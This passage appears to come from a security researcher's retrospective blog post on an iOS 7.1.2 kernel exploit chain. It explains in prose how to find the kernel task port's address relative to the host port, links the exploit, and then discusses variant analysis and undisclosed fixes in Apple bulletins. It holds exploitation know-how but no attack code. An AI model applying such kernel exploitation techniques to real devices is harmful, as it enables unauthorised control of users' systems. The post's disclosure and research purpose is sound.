Looking at the XNU source we can see that the host port is allocated before the kernel task port, and since this was before the zone allocator freelist randomisation mitigation was introduced this means that the address of the kernel task port will be somewhere below the host port.

By setting the msgh_local_port field to the address of the host port - 0x70, then decrementing it by 0x70 each time we receive a notification message we will be sent a different early port each time a notification message is sent. Doing this we learn that the kernel task port is allocated 5 ports after the host port, meaning that the address of the kernel task port is host_port_kaddr - (5*0x70).

Putting it all together
You can get my exploit for iOS 7.1.2 here, I've only tested it on an iPhone 4. You'll need to use an old version of XCode to build and run it; I'm using XCode 7.3.1.

Launch the app, press the home button to trigger an HID notification message and enjoy read/write access to kernel memory. :)

In 2014 then it seems that with enough OS internals knowledge and the right set of bugs it was pretty easy to build a logic bug chain to get kernel memory read write. Things have certainly changed since then, but I'd be interested to compare this post with another one in 2022 looking back to 2018.

Lessons
Variant analysis is really important, but attackers are the only parties incentivized to do a good job of it. Why did the userspace variant of this IODataQueue issue persist for four more years after almost the exact same bug was fixed in the kernel code?

Let's also not underplay the impact that just the userspace version of the bug alone could have had. Prior to mach_portal, due to a design quirk of the com.apple.iohideventsystem MIG service backboardd had send rights to a large number of other process's task ports, meaning that a compromise of backboardd was also a compromise of those tasks.

Some of those tasks ran as root meaning they could have exploited the processor_set_tasks vulnerability to get the task ports for any task on the device, which despite being a known issue also wasn't fixed until I exploited it in triple_fetch.

This IODataQueue issue wasn't the only variant I found as part of this project; the deja-xnu project for iOS 11.4.1 also contains PoC code to trigger a MIG code generation bug in clients of backboardd, and the project zero tracker has details of further issues.

A final note on security bulletins
You'll notice that none of the issues I've linked above are mentioned in the iOS 12 security bulletin, despite being fixed in that release. Apple are still yet to assign CVEs for these issues or publicly acknowledge that they were fixed in iOS 12. In my opinion a security bulletin should mention the security bugs that were fixed. Not doing so provides a disincentive for people to update their devices since it appears that there were fewer security fixes than there really were.